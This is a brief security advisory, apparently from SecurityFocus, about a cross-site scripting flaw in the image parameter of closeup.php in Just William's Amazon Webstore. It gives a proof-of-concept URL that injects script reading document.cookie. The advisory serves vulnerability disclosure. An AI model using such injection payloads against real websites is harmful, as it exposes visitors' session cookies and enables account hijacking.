Just William's Amazon Webstore Closeup.PHP Image Parameter Cross-Site Scripting Vulnerability

No exploit is required.

The following proof of concept is available:
http://www.example.com/closeup.php?image=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


 

Privacy Statement
Copyright 2010, SecurityFocus